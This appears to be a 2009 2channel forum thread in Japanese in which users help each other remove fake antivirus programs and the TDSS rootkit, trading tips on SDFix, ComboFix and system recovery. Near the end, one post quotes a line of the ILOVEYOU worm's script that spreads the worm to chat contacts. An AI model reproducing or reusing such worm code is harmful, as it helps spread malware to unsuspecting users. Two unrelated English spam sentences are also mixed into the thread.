285 :
名無しさん@お腹いっぱい。:2009/02/08(日) 23:22:18
>>282 backupsやRepairって意味わかる?
ダブルクリックしたら
「退治したTDSSウイルスを復活させますか?」
↑って意味だよ
せっかく削除したTDSSウイルスを復活させちゃ駄目だよ
286 :
282:2009/02/08(日) 23:54:40
何回かSDfixやってたらいくつかTDSSを駆除したようなのが終わったあとにでるリポートみたいのに出てきて、
その後で試したらAnti-Malwareが起動出来ました。
しかし45分ぐらいかかってスキャンがリポート等の表示もなにもなく突然終わり、
また起動出来なくなってしまいました…
相変わらずウイルスソフト等のダウンロードサイトには繋がらないままだし、勝手にMy computer online scanは出てくるし、明らかにウイルス消えてません…
>>286 諦めてフォーマットして、リカバリなり再インスコするなりした方が良さそうな・・・
とりあえずドライブ(HDD)がC:以外にもある場合は、
繋がっている全部のドライブを疑った方がいい
SDFixがダメなら、Dr.Web CureItやAvastでフルスキャンを試してみ
Antivirusってlinuxにも感染するの?
exe貼られてるの踏みそうになったんで気になるんだが
LinuxでWin32のバイナリが動くとでも?
Wineならともかく
いや、まあその通りなんだが
もう2010年版まで出たらしいから、そのうちlinux対応版wまででるかなと
291 :
256:2009/02/17(火) 20:03:36
>>291 TCP Monitor Plusでネット接続監視してみ
ホスト2でwinlogon.exeやIE、Firefoxが怪しいサイト(ZieF.plとか)に接続してなければおk
自力で駆除できた人も多いんですね。
自分はリカバリーしました・・・
こんな悪質なウイルスみたいなのは初めてでした。
動画サイトで何気なくスタートボタンを押したら入られてしまいました。。
これ恐ろしいですね。勉強になりました。。
いや、このウィルスに限らず、感染したらリカバリするのが一番確実
うだうだ文句たれて不確実な方法取るバカが大多数
あなたの決断には敬意を表する
295 :
名無しさん@お腹いっぱい。:2009/03/03(火) 09:13:23
そんな対策しなくても普通感染しないだろ
297 :
名無しさん@お腹いっぱい。:2009/03/03(火) 20:57:42
>>296 最新版のfirefox入れてアドオン無しの状態で
サイトを開いたら感染する
感染後はOSからウイルスファイルはrootkitによて隠蔽されていて見えない
だから、ウイルス対策ソフトからウイルスが見えないので役に立たない
298 :
名無しさん@お腹いっぱい。:2009/03/03(火) 21:35:55
笑わせるなよw
299 :
名無しさん@お腹いっぱい。:2009/03/03(火) 22:42:25
>>298 笑っていられるのは感染してないからだよ
300 :
名無しさん@お腹いっぱい。:2009/03/03(火) 22:50:20
ごめん間違えた
× 感染してない
○ 感染しているのに気づいていない
時折覗かせてもらっているのですが
>>299 >最新版のfirefox入れてアドオン無しの状態で
>サイトを開いたら感染する
そう仰いましたよね。
アドオン無しってことは、アドオンが無効になってる状態を言うんですよね?
どのサイト見て感染しました?
XPSP2(うpだて無し+ノーガード+IE6SP2)で踏んできてあげましょうか?
IEはFirefoxに比べてセキュリティが劣るブラウザですから、
あなたがXPSP3orVistaSP1+MicrosoftUpdate最新+セキュリティソフト最新+Firefoxの環境で感染したというのなら、
俺の環境では100%の確率で感染することになりますが?
302 :
◆W4g5HNoLOg :2009/03/04(水) 07:08:02
XPSP2 FireFox2.0.0.16 アドオンはgoogleツールバーのみインストール
の状態で2008/8後半のタイプのウイルスにサイトをみただけで感染
ぜひ踏んでもらいたいのですが、もう配布されていないので同じサイトを
2008/9に踏んでも再感染はしなかったです
サンドボックスや仮想化以外の方法でWebからの感染を防げないと考える理由は
ゼロデイ攻撃をしかけたサイトを踏んだ時に防ぐ方法がないからです
感染しない方法があるのならなぜ?感染しないと思うか理由や対策を教えてください
どうやって感染したか考えれば分かるだろ
Firefox3にしろよw
305 :
◆W4g5HNoLOg :2009/03/04(水) 18:07:45
>>303 どうやって感染したかはアップデートは全てしてあったはずなのでゼロデイ攻撃と推測してます
>>304 説明不足だったな
2008/08後半に感染
XPSP2 FireFox2.0.0.16 アドオンはgoogleツールバーのみインストール
の状態で2008/8後半のTDSSタイプのウイルスにサイトをみただけで感染
↓その当時最新版FireFox2.0.0.16です
http://mozilla.jp/press/releases/2008/ その後ウイルス駆除完了したのが2008/09になってからなので
2008/09にFireFox3にバージョンアップしました
>302
当時そのブラウザで感染したとき、ActiveXやJAVA Scriptなど切ってました?
IEでもそれらのものを無効にしておけば、感染するリスクは減ります。
ActiveX、JAVA Scriptじゃなければ、iframeとかかな?
俺のXPSP2はアップデートしてないけど、時々malwaredomainlistに載ってるサイト
(exploitだのtrojanだのRougeだの、cnドメインだのruドメインだの)を
片っ端から踏んでるけど、感染なんてしませんよ。
とりあえず、経験あるのみ。
307 :
◆W4g5HNoLOg :2009/03/04(水) 21:18:38
>>306 アドオンもgoogleバーのみで後はデフォルトのままです
JAVA Script切ったらほとんどのサイト見れませんよね
今は、怖いからアドオン入れて切ってますけど不便です
ゼロデイ攻撃だと思ってます
308 :
名無しさん@お腹いっぱい。:2009/03/04(水) 21:42:06
被害妄想
>>307 JAVA Scriptを切っても大概のサイトは見れます。
見れないサイトはその都度有効⇔無効と上手く切り替えていけば良いんですよ。
砂箱内でブラウザ動かせばおkかな?
311 :
名無しさん@お腹いっぱい。:2009/03/04(水) 23:11:49
2chにアクセスしてる時点で既に…
SDfixやったらリザルトに
TDSSなんちゃらを見つけたけど駆除できなかった
みたいなことが書いてあってだな…
次にMalwarebytes Anti Malwareをやってみたらスキャン途中にいきなり終わりやがる。何回やっても。
助けてくださいお願いしますぅ
あきらめてリカバリ
リカバリするとしてさー
画像とか音楽とかのデータを外付けHDに移してからとかしたらさ。
結局外付けHDにウイルスも移る?
>>314 移るウイルスもある
戻す時はオートラン切ってウイルス検索をする
そか…
まぁ別に悪い方法ではないよね?
そーやって検索かければ済む話だし。
参考にするわ。
ありがとう
317 :
名無しさん@お腹いっぱい。:2009/03/08(日) 22:22:46
>>312 SDfixをセーフモードで2回試してみて
駄目だったらComboFixをセーフモードで試してみてください
321 :
名無しさん@お腹いっぱい。:2009/03/31(火) 18:08:26
>>318 renus2008の駆除は簡単。1消す2終わり
322 :
名無しさん@お腹いっぱい。:2009/06/10(水) 18:48:37
なんかビビって速効ネット接続切っちまった
一応ノートン先生が検出・駆除してくれたんだけど、大丈夫か?
323 :
名無しさん@お腹いっぱい。:2009/07/26(日) 12:50:24
今新しくAntivirus360(Norton360のパクリ)ってのがが出てるっぽい。
324 :
名無しさん@お腹いっぱい。:2009/10/03(土) 07:21:12
工房
Scott and I talked and both felt strongly that the company needs a personal touch. ,
Which I must say, is not always the case after fighting. ,
327 :
名無しさん@お腹いっぱい。:2009/11/06(金) 18:24:52
Antivirus2009に昨日感染したよ
ノートンが検出したと思ったら感染していたよ
そんなもん実行しなきゃ感染なんてしないだろ
329 :
327:2009/11/07(土) 12:40:55
俺はただ海外の掲示板見てただけなんだぜ?
ちなみにセーフモードでSDfixとComboFix試したけど効果がないw
あり得ねえよ
なんかいつのまにか勝手にこれがインストールされてた
windows再起動後エクスプローラが起動しなかった
SUPERAntiSpywareでフルスキャンしても何も見つからず
どうすればいいんだか
セーフモードでやれよ?
これはルートキット駆除専門ソフトじゃないと厳しいはず
CombofixかSDFixで削除できるが
それプラス、残りカスは普通のスパイウェア対策ソフトで駆除
Scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
削除できた?